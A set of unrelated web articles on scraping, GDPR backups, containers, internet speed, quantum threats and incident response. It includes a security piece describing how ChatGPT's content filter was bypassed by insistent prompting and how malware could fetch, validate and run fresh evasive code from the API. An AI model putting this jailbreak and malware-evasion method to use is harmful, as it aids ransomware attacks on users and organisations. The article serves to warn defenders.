effects of data scraping. For example, sending too many automated requests to a particular website using a data scraping tool could slow or crash the site. It could also be misconstrued or flagged as a distributed denial of service (DDOS) attack, an intentional and malicious effort to halt or disrupt traffic to a site. Data Scraping Mitigation Websites can employ a variety of measures to protect themselves from unauthorized data scraping outside of their dedicated API. Some of the most common include the following: - Rate limiting—limiting certain types of network traffic to reduce strain and prevent bot activity. - CAPTCHAs—requiring users to complete an automated test to “prove” they are a human visitor. - Robots.txt—a text file containing instructions defining what content bots and crawlers can use and what’s off limits. - Intelligent traffic monitoring—using automated tools to monitor traffic for tell-tale bot patterns and behaviors. - User-agent analysis—monitoring any software that tries to retrieve content from a website and preventing suspected scraping tools. - Required authentication—not allowing access to any unauthorized user or software. - Dynamic website content—web content that changes based on user behavior that can recognize and block scraping tools. Data Scraping Tools Beautiful Soup is a Python library of prepackaged open-source code that parses HTML and XML documents to extract information. It’s been around since 2004 and provides a few simple methods as well as automatic encoding options. Scrapy is another free, open-source Python framework for performing complex web scraping and crawling tasks. It can be used to extract structured data for a wide range of uses, and can be used for either web scraping or API scraping. Octoparse is a free, cloud-based web scraping tool. It provides a point-and-click interface for data extraction, allowing even non-programmers to efficiently scrape data from a wide range of sites, and uses an advanced machine learning algorithm to locate data. Parsehub is a cloud-based app that provides an easy-to-use graphical user interface, making it possible for non-programmers to use it intuitively to find the data they want. There’s a free version with limits. The standard version is $149 per month, and the Professional version costs $499 per month. Data Scraping vs. Data Crawling Data scraping and data crawling both concern the extraction of information from websites. Data scraping focuses on extracting specific information from numerous web pages on various sites. Data crawling is a broader process, primarily used by search engines. Web crawlers, also referred to as spiders, systematically scour the web to collect information about each website and web page rather than the information contained within the pages themselves. This information is then indexed for search engine and archival purposes. Bottom Line: What is Data Scraping? Data analytics is increasingly critical for businesses looking for a competitive advantage, more streamlined operations, better business intelligence, and data-driven decision-making. At the same time, we’re producing more data than ever before—from online shopping to social media, information about behaviors, interests, and preferences is widely available to anyone who knows where to look. Data scraping is a way for enterprises to use automated tools to cast a wide net that gathers massive volumes of data that meets the specifications they define. It’s useful for a wide range or purposes, and prebuilt code libraries serve as easy-to-use data scraping tools that make the process feasible for even non-technical users. Because data scraping can involve personal information, there are legal and ethical concerns. Any enterprise data scraping effort should take regional and jurisdictional regulations into account, and should be reviewed on an ongoing basis to keep pace with changing policies. Learn more about the pros and cons of big data, of which data scraping is just one component.
<urn:uuid:026d19bd-7990-4992-8057-3afa4a1e7fef>
CC-MAIN-2024-38
https://www.datamation.com/big-data/data-scraping/
2024-09-08T10:37:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650976.41/warc/CC-MAIN-20240908083737-20240908113737-00560.warc.gz
en
0.909104
2,369
3.140625
3
The General Data Protection Regulation (GDPR) is a comprehensive data protection law that came into effect in the European Union (EU) on May 25, 2018. It aims to harmonize data protection laws across EU member states and strengthen the rights of individuals regarding their personal data. When it comes to data backup, the GDPR imposes certain requirements to ensure the protection and privacy of personal data. Organizations must understand these requirements and their impact on their data backup practices. Under the GDPR, personal data should be processed in a manner that ensures appropriate security, including protection against unauthorized or unlawful processing, accidental loss, destruction, or damage. This means that organizations need to implement proper backup practices to safeguard personal data and ensure its availability in the event of a data breach or loss. Additionally, the GDPR introduces the right to be forgotten, which allows individuals to request the erasure of their personal data. This poses a challenge for data backup, as organizations need to be able to identify and delete personal data from backups upon request. Understanding the GDPR and its impact on data backup is crucial for organizations to ensure compliance and avoid hefty fines and reputational damage. Proper backup practices play a vital role in ensuring the privacy and security of personal data in compliance with the GDPR. First and foremost, organizations should implement strong encryption techniques to protect backup data. Encryption ensures that even if unauthorized individuals gain access to the backup files, they won't be able to read or use the data. Regular backups should be conducted to ensure that personal data is not lost in the event of a system failure, data corruption, or cyber attack. Organizations should establish backup schedules and automate the backup process to ensure consistency and reliability. It's important to store backup data in secure locations, both physically and digitally. Physical backups should be stored in locked cabinets or secure off-site facilities, while digital backups should be stored on encrypted drives or secure cloud storage platforms. Access controls should be in place to restrict unauthorized access to backup data. Only authorized personnel should have access to backup files, and strong authentication measures should be implemented to prevent unauthorized access. By following proper backup practices, organizations can ensure the privacy and security of personal data, reducing the risk of data breaches and non-compliance with the GDPR. Storing backup data inside the EU offers several benefits for GDPR compliance. Firstly, the GDPR restricts the transfer of personal data outside the EU unless certain conditions are met. By storing backup data within the EU, organizations can ensure compliance with these restrictions and avoid potential legal issues. Storing backup data within the EU also enhances data protection. The EU has strict data protection laws and regulations in place, which ensure that personal data is processed and stored securely. By aligning backup practices with these laws, organizations can enhance the privacy and security of personal data. Another benefit of storing backup data inside the EU is the proximity to the data source. In the event of a data breach or loss, organizations can quickly restore the backup data and minimize the impact on business operations. Overall, storing backup data inside the EU not only helps organizations comply with the GDPR but also provides enhanced data protection and faster data recovery. When it comes to GDPR compliance, choosing the right backup solutions is crucial. Firstly, organizations should consider backup solutions that offer strong encryption capabilities. This ensures that backup data remains protected even if it falls into the wrong hands. Furthermore, organizations should select backup solutions that provide granular recovery options. This enables them to easily locate and restore specific files or data elements, which is essential for responding to data subject requests and complying with the right to be forgotten. It's also important to choose backup solutions that offer robust access controls and audit trails. These features help organizations monitor and control access to backup data, ensuring compliance with the GDPR's security requirements. By carefully evaluating and selecting the right backup solutions, organizations can ensure GDPR compliance while effectively protecting and managing their backup data. Implementing data backup strategies in line with GDPR requirements requires following best practices. First and foremost, organizations should conduct a thorough data inventory and mapping exercise to identify all personal data they hold, where it is stored, and how it is processed. This helps in understanding the scope of backup requirements and ensuring that all personal data is properly backed up. Organizations should also establish clear retention and deletion policies for backup data. These policies should align with the GDPR's principles of storage limitation and the right to erasure. Backup data that is no longer required should be securely deleted to avoid unnecessary data storage and potential non-compliance. Regular testing and validation of backup procedures is essential to ensure the availability and integrity of backup data. Organizations should conduct periodic backup tests to verify that backup files are complete, accessible, and can be successfully restored. It's important to regularly review and update backup strategies to adapt to changing business needs and GDPR requirements. Organizations should stay informed about any updates or changes to the GDPR and adjust their backup practices accordingly. By following these best practices, organizations can implement data backup strategies that align with GDPR requirements and ensure the effective protection and availability of personal data.
<urn:uuid:729624b8-684b-40a9-9fc9-ae28bb6792b9>
CC-MAIN-2024-38
https://www.impossiblecloud.com/blog/the-crucial-role-of-data-backup-in-gdpr-compliance
2024-09-08T08:52:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650976.41/warc/CC-MAIN-20240908083737-20240908113737-00560.warc.gz
en
0.915078
1,054
3.15625
3
In this video from the Blue Waters 2018 Symposium, Tiziana DiMatteo from Carnegie Melon University presents: Massive Galaxies and Black Holes at the Cosmic Dawn. “The first billion years is a pivotal time for cosmic structure formation. The galaxies and black holes that form then shape and influence all future generations of stars and black holes. Understanding and detecting the the first galaxies and black holes is therefore one of the main observational and theoretical challenges in galaxy formation.” Tiziana Di Matteo is a pioneer in the study of the early universe, black holes and computer simulations of galaxy formation. Her simulations, which are among the largest to be completed, were the first to incorporate black hole physics. Her more than 40 peer-reviewed papers have received more than 1000 citations by other scientists. Her findings have been published in peer-reviewed journals such as Nature, The Astrophysics Journal and Monthly Notices of the Royal Astronomical Society. Di Matteo’s research has been featured in PBS’s NOVA, Astronomy Magazine, Science News, MSNBC Science and Technology and the Pittsburgh Post-Gazette.
<urn:uuid:ee6ee48c-91db-4377-b869-6338820b5eff>
CC-MAIN-2024-38
https://insidehpc.com/2018/08/video-massive-galaxies-black-holes-cosmic-dawn/
2024-09-10T20:50:00Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00360.warc.gz
en
0.919103
233
3.453125
3
Containers are Virtual Machines After All Many a nerd has thrown punches over the question of whether containers (e.g. Docker, LXC, etc.) are actually virtual machines. The conventional wisdom is that although containers are similar to virtual machines, they’re fundamentally different. I beg to differ. Are containers virtual machines or not? There’s a common analogy that VMs are like houses and containers are like apartments. And you are the application. When you live in a house, you have free rein to do as you please. When you live in an apartment, you have to share certain spaces, and parts of the building are off-limits. Interestingly, this analogy suggests that the difference between containers and VMs is not one of architecture but of implementation! Apartment buildings and houses both have rooms, water, electric, roofs, and doors. Containers and VMs both virtualize compute, storage, networking, and memory. So what’s the difference, really? Shared Almost Nothing Those who say that a container is not a virtual machine are quick to note that all containers on a host share the same kernel. Not a copy of the same kernel, but the exact same kernel running on the host. Virtual machines, on the other hand, have completely isolated kernels. If you’re running 100 identical Linux VMs, each VM has its own unique copy of the same kernel. You can upgrade the kernel in one, and it doesn’t affect any others. That seems like a pretty significant difference. But let’s look a little deeper. Containers do use virtualization, but rather than fully virtualizing compute, network, storage, and memory, containers do something a little different. They fully virtualize the compute and networking portion. But storage and memory, on the other hand, are mostly but not completely virtualized. The kernel is stored on the host, and the container is given read-only access to it. The rest of a container’s storage and memory are virtualized. In a container, the operating system is necessarily separated from the rest of the VM. But that hardly means containers aren’t VMs. VMs that Look Like Containers? With a little tweaking, a traditional virtual machine could meet the criteria of a container. One could, for example, create a shared, read-only filesystem containing a Linux kernel and have multiple VMware virtual machines booting from it. As those VMs boot, VMware could identify the duplicate virtual memory blocks and deduplicate them. Those VMs wouldn’t cease to be virtual machines just because they’re all sharing a kernel. Let’s take a more realistic example: multiple virtual machines booting Kali Linux from a shared, read-only ISO. Each VM has its own virtual disk for persistence, but the operating system kernel is shared. Is that a container? Containers Were Born On Linux There’s a reason containers were born on Linux and not Windows. The Linux architecture lends itself to the clean separation of the kernel from everything else. Windows, on the other hand, just mashes it all together. That’s why Windows and *nix went into opposite directions. To get more efficient use of system resources, FreeBSD got jails, and Linux got OpenVZ, LXC, and eventually Docker. Windows, on the other hand, just got full-on x86 virtualized. Containers Mimic Physical Machines As I said in an earlier post, virtualization is mimicry. Containers present applications with compute, memory, storage, and networking, and control how applications can use those resources. Virtual machines do the exact same thing. Not only that, you can start, stop, pause, and shutdown containers, just like with VMs! At this point, it’s starting to become clear that the earlier analogy – VMs being like houses – is flawed. Virtual machines aren’t like houses per se, but like buildings in general. Containers are a particular implementation of virtual machine, like an apartment is a particular instance of a building. Containers Aren’t Those VMs Let me be clear that I’m not suggesting that people who say containers aren’t VMs are wrong. When people say containers aren’t VMs, they’re trying to explain that a container is not the kind of virtual machine you’d find in VMware or Hyper-V. It’s not the type of VM you attach an ISO to, boot up, and install an operating system on. It’s perfectly valid to insist that containers are not those types of virtual machines because, well, they’re not. They’re very different. My goal here is to highlight the similarities so that the differences become more apparent. Also, I’m not saying containers are bad. Far from it. I’ve been using Docker since 2014 and I love it. And I’m excited to see how Docker for Windows Server will fare. Application virtualization has been a holy grail of Windows for a long time, and Docker just might finally deliver it.
<urn:uuid:89cf4d9f-f0d1-408d-bfd2-4ef985e2747f>
CC-MAIN-2024-38
https://benpiper.com/2017/09/containers-are-virtual-machines-after-all/
2024-09-12T01:57:32Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00260.warc.gz
en
0.923705
1,077
2.75
3
Downloading is anytime that you request files from somewhere else on the internet and deliver them to your computer; this happens constantly, like whenever you view a webpage (such as this one!). Uploading is anytime that you send files from your computer to somewhere else on the web, such as when posting a family photo to Facebook or sending an email. You are both uploading and downloading whenever you do a Zoom or Skype call, since you’re viewing video from others and sending them your own video. Both upload and download are always calculated as some amount of data per second. Since data itself is measured in something called “bits” or “bytes”, your internet speed is calculated this way as well. File sizes for anything from emails to pictures to videos all begin with individual bytes and work upward from there, to kilobytes (kb), megabytes (mb) and gigabytes (gb). Each one of these refers to thousands and thousands of bytes being delivered to your computer every single second. That’s why, when you’re looking up internet speeds with your internet service provider (ISP), you’ll usually see Mbps or Gbps listed as the measurement. If your ISP can provide 50Mbps (fifty megabits per second), then that’s considered the speed of your internet. What Is Broadband? As defined by the Federal Communications Commission (FCC), a broadband internet connection must have a certain minimum download speed. This speed is currently set at 25 Mbps (25 megabits per second) for downloads, and 3 Mbps (3 megabits per second) for uploads. Fiber internet is another type, and the speeds here can go lightning fast, reaching or even exceeding 1 Gbps — aka, 1,000 Mbps. From this starting point of broadband, we can quickly gauge whether a certain person or business has a good internet speed. One important point to remember is that there are several factors that can ultimately affect your personal internet speed and upload/download performance. For instance, the more devices that are connected to a single internet connection, the slower that connection will generally be. There’s simply not enough “bandwidth” to process all those data requests at the same time. When this happens, it’s almost exactly like a bottleneck of traffic on the highway. When a road with four lanes gets temporarily closed down to just one lane due to an accident or construction, all the cars are forced to use the same lane and slow down. This is the same principle as having a bunch of different computers or other devices connected to one internet connection, whether at home or at work. In addition to broadband, there are other types of internet offered, including satellite internet. The problem with satellite internet is that the speed and performance you get will not match up to broadband (even if the Mbps offered is actually higher!) due to technical things called “latency” and “packet jitter”. Don’t worry about the terms themselves. Just know that you’re much better off with broadband internet or fiber internet than with satellite internet. What Is a Fast Internet Speed? What Is a Slow Internet Speed? With all that in mind, we can take a look at what is considered a “fast” or “slow” internet speed, depending on its relation to standard broadband. If your business gets internet that is a lot faster than the typical broadband connection we discussed above, then this is usually regarded as fast internet. On the other hand, if your internet speed is below those normal broadband connection limits, then that would generally be considered slow internet. Of course, not all “fast” internet is created equal, and fast internet speeds can range pretty widely themselves. Further, you have to consider both upload and download separately, since the speeds for each one vary as well. Let’s take a look at all these factors that go into a good internet speed. What Difference Does a Good Internet Speed Make? Generally speaking, if you have upload speeds of 10 Mbps or higher, then that’s typically considered a good internet speed, because this allows for most common internet activity. If you have a good internet speed/connection, then your experience on the internet will be much better, more enjoyable, and require less waiting time for files to send or videos to buffer. Here’s a few examples of internet activity and how much speed you need for it, with cases for both upload and download (in order, from least to greatest): - Instagram posting usually only requires uploading a photo of about 2-5 megabytes. This would take you about 1 minute with a standard broadband internet connection (600kbps upload). - YouTube videos can be streamed online at just 500 Kbps download speed, which is less than even the minimum for broadband. - Zoom has certain minimum requirements for streaming high-quality video calls: 1 Mbps (upload) / 600 kbps (download). - Netflix has a minimum speed requirement of roughly 3 Mbps download speed for standard definition streaming and 5 Mbps for high definition (HD). This is a bit higher than standard broadband minimums, because of the file sizes of the HD videos. These are just a few examples, but the vast majority of your activity online will fall somewhere in the range above, from Instagram (small photos) to Netflix (HD videos), with some requiring even less (like simple email), and very few requiring more. As mentioned above, 10 Mbps download speed would be more than enough for all of these activities, which is offered widely across the United States. In fact, most ISPs offer much higher than this in all but the most rural or remote locations. However, if you don’t have at least a standard broadband connection, your internet activity could become very difficult and frustrating, especially if you’re trying to conduct business. Take a Speed Test If you’re curious whether your internet speed is up to par, or if you want to know how long a certain size file will take to download, there are speed tests and calculators available online for free. To determine your exact internet speed right now, you can use SpeedTest.net. This website has been around for a long time and trusted by millions of people to figure out their internet speed. To figure out how long a certain file will take to download, you simply input the answer from the speed test above into the speed section and then add the file size to Omnicalculator. Their bandwidth calculator will instantly give you the answer in time required to download. Good Internet Speed Matters As you can see, having a good internet speed matters. If you’re struggling with your internet service speeds or you simply want someone to inspect your existing infrastructure, then you’re in the right place. Give us a call or email at Bristeeri today, and we’ll get your internet issues squared away and get you back to your work and your life in no time.
<urn:uuid:a4d898c5-2d25-4c1c-a2ca-3e38bb1cbe19>
CC-MAIN-2024-38
https://bristeeritech.com/it-security-blog/what-is-good-internet-speed-upload-download/
2024-09-14T14:35:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00060.warc.gz
en
0.941424
1,448
3.1875
3
By now, you have probably heard or read about – if not used – ChatGPT and are blown away by everything it can do. If you haven’t, let’s bring you up to speed. ChatGPT is a popular AI-based program used to generate dialogues. It’s taken the world by storm and changed how people see and use AI. While an online tool, its creator OpenAI has stated that ChatGPT doesn’t have internet connectivity and can’t query or read anything online. Instead, it is trained on a massive dataset and, as a result, cannot provide up-to-date responses to queries. It’s also important to note that although ChatGPT will try to answer anything, the program is said to have built-in content filters preventing it from answering questions regarding subjects that could be problematic. But is that really the case? Let’s unpack this a little further and look at the technology’s potential malicious uses. Bypassing the Content Filter The existence of content filters is common in the learning model language chatbot. They are often applied to restrict access to certain content types or protect users from potentially harmful or inappropriate material. We wanted to see if cyber-criminals could maliciously use ChatGPT, so asked the chatbot for a devious code. As expected, our request was refused as the content filter was triggered. More often than not, though, chatbots have blind spots. ChatGPT isn’t any different; we just needed to find it. Our first goal was to find a way to bypass the content filter. We managed it by insisting and demanding. Interestingly, by asking ChatGPT to do the same thing using multiple constraints and asking it to obey, we received a functional code. We can then use ChatGPT to mutate this code, creating multiple variations of the same code. It’s important to note here that when using the API, the ChatGPT system doesn’t seem to utilize its content filter. In fact, one of the powerful capabilities of ChatGPT from a cyber perspective is the ability to easily create and continually mutate injectors. By continuously querying the chatbot and receiving a unique piece of code each time, it is possible to create a polymorphic program that is highly evasive and difficult to detect. Let’s examine this with the typical use case of malware and ransomware behavior. A Four-Step Process Our approach centers around acquiring malicious code, validating its functionality and executing it immediately. It follows the following process: Get: It only requires a quick function code to find some files that ransomware might want to encrypt. Once found, similar codes can be used to read the files and encrypt them. So far, we have seen that ChatGPT can provide the necessary code for typical ransomware, including code injection and file encryption modules. Where? The primary disadvantage of this approach is that once the malware is present on the target machine, it is composed of clearly malicious code. This makes it susceptible to detection by security software such as antivirus, endpoint detection, response or anti-malware scanning interfaces. The detection can be bypassed by utilizing the ChatGPT API within the malware itself on-site. To accomplish this, the malware includes a Python interpreter (taking Python as an example), which periodically queries ChatGPT for new modules that perform malicious actions. This allows the malware to detect incoming payloads in the form of text instead of binaries. Additionally, by requesting specific functionality such as code injection, file encryption or persistence, we can easily obtain new code or modify existing code. This results in polymorphic malware that doesn’t exhibit malicious behavior and often does not contain suspicious logic while in memory. The high level of adaptability achieved makes the malware highly evasive to security products which rely on signature-based detection. It can also bypass measures such as an anti-malware scanning interface (AMSI) as it eventually executes and runs Python code. Validate and Execute: Validation of the functionality of the code received from ChatGPT can be achieved by establishing validation scenarios for the different actions the code is supposed to perform. Doing so allows the malware authors to be sure the code generated is operational and that it can be trusted to accomplish its intended task. This proactive step ensures the reliability of the code. The final step in our process is executing the code received from ChatGPT. By using native functions, this malware can execute the received code on multiple platforms. On top of that, as a measure of caution, the malware could choose to delete the received code, making forensic analysis more challenging. There’s More to Come As we have seen, the malicious use of ChatGPT’s API within malware can present significant challenges for security professionals. This is not just a hypothetical scenario but a very real concern. This is a field that is constantly evolving, and as such, it’s essential to stay informed and vigilant. As users learn how to best arrange their queries for the best results, we can anticipate the bot becoming smarter and more powerful. Like previous AI models, ChatGPT will likely get more skilled the longer it is in operation and the more cyber-related queries and information it encounters. With cyber-criminals looking for new and improved ways to trick and attack people and businesses, it’s important to be vigilant and ensure your security stack is watertight and covers all bases.
<urn:uuid:c0350c97-ef42-4166-a66c-fb7c608a24ef>
CC-MAIN-2024-38
https://www.infosecurity-magazine.com/opinions/chatgpt-create-malware-how/
2024-09-16T21:59:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00760.warc.gz
en
0.947198
1,139
2.84375
3
Anatomy of a quantum attack (QuantumXchange) April Burghardt of Quantum Xchange authored a recent essay on cyberattacks. IQT-News summarizes for our readers: Advanced computers, quantum being one, have the potential to wreak havoc on the data, systems, devices, and networks we rely on daily. A conventional computer would need 300 trillion years to break RSA encryption – considered the gold standard for Public Key Encryption (PKE). A quantum computer will be able to do it in 10 seconds! Research by the Organization of American States found cyberattacks against critical infrastructure and manufacturing are more likely to target industrial control systems than steal data. More than half (54 percent) of the 500 critical infrastructure suppliers surveyed reported attempts to control systems, while 40 percent said they had experienced attempts to shut down systems entirely. While most assume cyberattacks will be launched using conventional, binary computers, imagine the catastrophic consequences of a large-scale quantum attack on critical infrastructure. In the hands of the enemy, a quantum computer capable of destroying RSA- encrypted data would have devastating effects on our critical infrastructure and economy. It’s no different than the fear of conventional warfare going nuclear. Yet, we know adversaries are stealing our encrypted data, waiting for the day a quantum computer can break its encryption – an attack known as harvesting. Another area ripe for exploitation by cybercriminals and state-sponsored actors is Space. Either exploited by military groups or criminal gangs, attacks on satellites, their systems, and base stations on Earth are seeing a steady uptick. More than 4,000 satellites are currently orbiting Earth with thousands more planned to launch by private industry the likes of SpaceX, Amazon, OneWeb and others. While this lowered barrier to entry increases innovation and discovery, it also increases the number of potential access points for hackers. Keeping space technology infrastructure and communications safe is a growing concern of the U.S. government. Legislation proposed by U.S. House of Representatives Ted Lieu and Ken Calvert aims to classify space as critical infrastructure to boost public-private collaboration on cybersecurity matters. As the Information Age gives way to the Quantum Age of computing it will require the largest global cryptographic transition in the history of computing. NATO, the U.S. government, the EU and other global institutions and governments around the world are preparing now for quantum attacks or Y2Q – the day a quantum computer breaks encryption. As mentioned earlier, the White House has taken a leading role, recently issuing NSM-8, a national security memorandum that builds on the original Executive Order 14028 issued on May 12, 2021 to improve the nation’s cybersecurity and protect federal government networks. Tune into QuantumXchange’s latest on-demand webinar on Assessing the True Threat and Potential Damage of Quantum Computing Cyberattacks, for better understanding of quantum attacks. Sandra K. Helsel, Ph.D. has been researching and reporting on frontier technologies since 1990. She has her Ph.D. from the University of Arizona.
<urn:uuid:dfb0fb6a-6772-4364-938b-4006b8d23c1b>
CC-MAIN-2024-38
https://www.insidequantumtechnology.com/news-archive/anatomy-of-a-quantum-attack/
2024-09-16T23:46:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00760.warc.gz
en
0.929108
620
2.75
3
How do you swiftly counter and recover from cybersecurity incidents, for example, phishing attacks? Mastery of the incident response lifecycle is crucial. This article explores each critical phase—preparation, detection, analysis, containment, eradication, recovery, and post-incident review—to guide you through a tactical approach to threat management. Learn the strategies that fortify defences and streamline recovery to minimise disruption from cyber attacks. Are you monitoring the dark web? The NIST incident response lifecycle, for example (and others) offer a structured approach integral for managing and mitigating cybersecurity incidents, comprising stages such as preparation, detection, containment, eradication, recovery, and post-event activities. A thorough incident response plan and a trained, ready incident response team are essential for effective crisis management, involving regular training, phishing simulation exercises, and understanding the roles of team members. Post-incident reviews are critical and should involve lessons learned meetings, detailed incident documentation, and continuous improvement of the incident response plan to address weaknesses and refine strategies to counter future incidents. Understanding the Incident Response Lifecycle The NIST incident response lifecycle serves as a deliberate process to handle and lessen the impact of cybersecurity incidents. It is a structured approach that includes several stages, namely preparation, detection and analysis, containment, eradication, and recovery, and post-event activity. This structured approach is also known as the incident response process. The National Institute of Standards and Technology (NIST) outlines a similar process, emphasising four primary stages: preparation, detection/analysis, containment/eradication, and recovery, which is referred to as the NIST incident response process and associated NIST incident response lifecycle. A well-planned lifecycle offers a methodical structure for spotting and reacting to security threats, thereby lessening the effects of cyber incidents. It facilitates strategic detection and management of attacks within organisations using incident response procedures, thus improving cybersecurity practices. The Importance of a Well-Defined Lifecycle An organised incident response lifecycle plays a significant role in reducing downtime. An example incident might be a ransomware attack. By facilitating prompt and efficient action against threats as soon as an incident occurs, it minimizes the impact of the incident and decreases recovery time. It also aids in managing the aftermath of a security breach and mitigating future risks, thereby reducing potential losses. Enhancing the overall security posture of an organisation is crucial in minimizing the impact of cybersecurity incidents and strengthening the organisation’s ability to withstand future incidents. A well-structured incident response lifecycle contributes to this by enabling efficient identification and management of these incidents, thereby improving security strategies and resilience. Key Components of the Incident Response Lifecycle The key elements of the incident response lifecycle encompass: Detection and analysis Follow-up activities post-incident These stages are essential in addressing the situation after an incident occurred. Each element has a crucial part in overseeing a cybersecurity incident. The key elements of incident response are: Preparation: Establishing policies, procedures, and resources for incident response. Detection and analysis: Identifying and analyzing security incidents. Containment, eradication, and recovery: Isolating and removing threats, restoring systems, and recovering data. These elements work together to effectively manage and respond to cybersecurity incidents according to the NIST incident response lifecycle. Post-incident activity involves conducting a review after an incident, documenting lessons learned, and updating response plans. These components, such as clear action steps, roles, and responsibilities, are significant in an effective incident response strategy as they aid in preventing chaos during a breach and minimizing damage, recovery time, and costs. Preparing for Cybersecurity Incidents Preparation, being the initial step in the NIST incident response lifecycle, holds a central position in managing cybersecurity incidents. It involves: Developing an effective incident response plan Building a dedicated incident response team Conducting training and simulation exercises to prepare the team for potential security incidents The main goals of simulation exercises encompass: Evaluating the effectiveness of incident response plans Identifying weaknesses in response capabilities Testing the resilience of the organisation’s incident response plan amid emergency scenarios These proactive measures help organisations to be ready for potential security incidents and minimize the potential damages. Developing an Incident Response Plan An incident response plan serves as an extensive scheme detailing the organisation’s response to security incidents. Essential components of an incident response plan comprise: Formal documentation of roles and responsibilities Incident detection and analysis Incident containment and eradication Post-incident review and lessons learned Routine plan updates To develop an effective incident response plan, follow these incident response steps: Establish a policy Form an incident response team and define their responsibilities Conduct tabletop exercises By following these steps, you can ensure that your organisation is prepared to respond to any incidents that may occur. The plan should also include contact information for all incident response team members and establish a formal incident response capability. Building an Incident Response Team Establishing a committed incident response team is imperative for administering cybersecurity incidents. Such a team ensures a coordinated and efficient response to incidents, thereby minimizing the impact and reducing the time to recover. In fact, having multiple incident response teams can further enhance an organisation’s ability to handle complex cybersecurity incidents. The key responsibilities of the members in an incident response team include ensuring timely response to incoming tickets, phone calls, and tweets, providing leadership, conducting investigations, managing communications, handling documentation, and providing legal representation. Moreover, team members are tasked with analysing the root causes of incidents and implementing preventive measures to avoid similar events in the future. Training and Simulation Exercises Conducting training and simulation exercises are indispensable to ready the incident response team for actual incidents. These exercises provide substantial advantages such as: Acquiring experience in a secure environment Assessing organisational preparedness Boosting morale and fostering team unity Fulfilling regulatory obligations Improving response capabilities Enhancing team cooperation Simulation exercises contribute to the enhancement of incident response team effectiveness by preparing them through stress testing of plans and systems. They facilitate the testing of: This helps identify gaps and provides a deeper understanding of the incident response. Detection and Analysis of Security Incidents The detection and analysis phase in the incident response lifecycle entails recognising and evaluating potential threats. Various monitoring systems and tools play a crucial role in this stage. They assess network traffic patterns, scrutinise logs, monitor dark web sites, events, ransomware activities, and recognise activity patterns that suggest compromise. Threat intelligence is another crucial aspect of this stage. It offers essential insights that facilitate expedited and more efficient decision-making, consequently diminishing response times and mitigating the consequences of cyber incidents. Additionally, it assists in enhancing the comprehension of the threat landscape to improve risk management. Monitoring Systems and Tools Effective monitoring solutions are crucial in detecting and analysing security incidents. For example, dark web monitoring software. Monitoring systems contribute to the detection and analysis of security incidents by assessing network traffic patterns, scrutinizing logs, events, and activities, and recognising activity patterns that suggest compromise. Efficient monitoring tools for identifying cybersecurity incidents include Security Information and Event Management (SIEM) tools such as IBM QRadar, ArcSight, and LogRhythm, as well as SolarWinds Threat Monitor. Threat Intelligence and Data Analysis Threat intelligence holds a significant position in recognising and comprehending potential threats. It provides insights that enable faster and more efficient decision-making, resulting in decreased response times and minimized impact. Along with risk management advantages, it helps in discerning false positives and prioritizing alerts, enabling informed security decisions based on data. Are you following the guidance s by the NIST incident response lifecycle, ISO, or ISACA? Threat intelligence is acquired through a diverse range of data sources and automated tools, including artificial intelligence and machine learning, for the purpose of correlating disparate information and identifying patterns. This process transforms raw threat data into actionable intelligence, which is crucial for the analysis and response to security incidents. Containment, Eradication, and Recovery The containment, eradication, and recovery phases of the incident response lifecycle concentrate on lessening the effect of a security incident and reinstating regular operations. The containment stage involves identifying and removing malware, vulnerabilities, or unauthorized access, as well as verifying system cleanliness and security. The eradication stage involves implementing a permanent solution after containment to prevent similar incidents in the future. The goal here is to completely remove the root cause of the security incident with a high level of certainty. Containment strategies play a critical role in managing cybersecurity incidents. They involve: Preparing systems and procedures Promptly identifying security incidents Containing incident activities and attackers Progressing towards eradication and recovery To select the optimal containment strategy for a specific cybersecurity incident, it is crucial to assess the potential impact of the incident, the necessity to sustain essential services, and the available resources. Examples of effective containment strategies being put into practice may involve isolating affected systems, disconnecting them from the network, and implementing strict access controls to limit the impact of the incident. Eradication and System Restoration The eradication stage in incident response management entails removing threats and restoring affected systems to their original state. Fundamental procedures for eliminating threats from affected systems include the removal of malware, identification of the root cause of the attack, and implementation of measures to prevent future attacks. Ensuring the integrity of a system after restoration involves: Maintaining data integrity in the communication infrastructure Implementing rapid detection, repair, and recovery strategies for lost data Classifying integrity assurance mechanisms into preventive steps Rigorously maintaining the hardware and operating system environment Validating inputs to safeguard data integrity. Recovery and Business Continuity The recovery stage emphasises the importance of having a well-documented recovery process to minimize downtime and ensure business continuity. Backups and redundancies play a crucial role in maintaining business continuity during cybersecurity incidents. They enable businesses to resume operations in the event of redundant power and internet failures, and they are essential for creating data copies to mitigate the risk of data loss incidents. During the recovery phase of incident response, it is essential to conduct testing on systems that underwent repair, replacement, or reinforcement in the eradication phase to verify their security and proper functionality. Post-Incident Review and Improvement The review phase post-incident holds substantial importance in the incident response lifecycle. It enables those involved in incident handling to analyze the event, comprehend its causes, and derive valuable lessons to enhance future incident response capabilities. This fosters a thorough examination that contributes to heightened comprehension and readiness for subsequent incidents. Steps like lessons learned meetings, incident documentation, and reporting post-incident are vital to learn from the experience and enhance the organisation’s security stance. These steps allow organisations to identify areas for improvement and pinpoint vulnerabilities and deficiencies in defenses. Lessons Learned Meetings Lessons learned meetings are an important aspect of the post-incident review phase. They serve as a platform for analyzing the causes and underlying reasons for the incident and pinpointing deficiencies in organisational security practices. This helps in mitigating the likelihood of similar incidents in the future. Meetings to review lessons learned after a cybersecurity incident should cover response effectiveness, communication gaps, and root cause analysis. It is advisable to schedule the meeting within a week of resolving the incident and include all relevant participants. Incident Documentation and Reporting Incident documentation and reporting are important aspects of the post-incident review phase. Documenting and reporting cybersecurity incidents ensure that the details of the event are recorded to enable effective response to the incident and serve as a learning tool for the organisation to prevent future security breaches. Essential components to incorporate in an incident report within the realm of cybersecurity generally encompass details of the incident, including its timing, method of occurrence, impact on affected entities, and the extent of the incident. Continuous Improvement and Plan 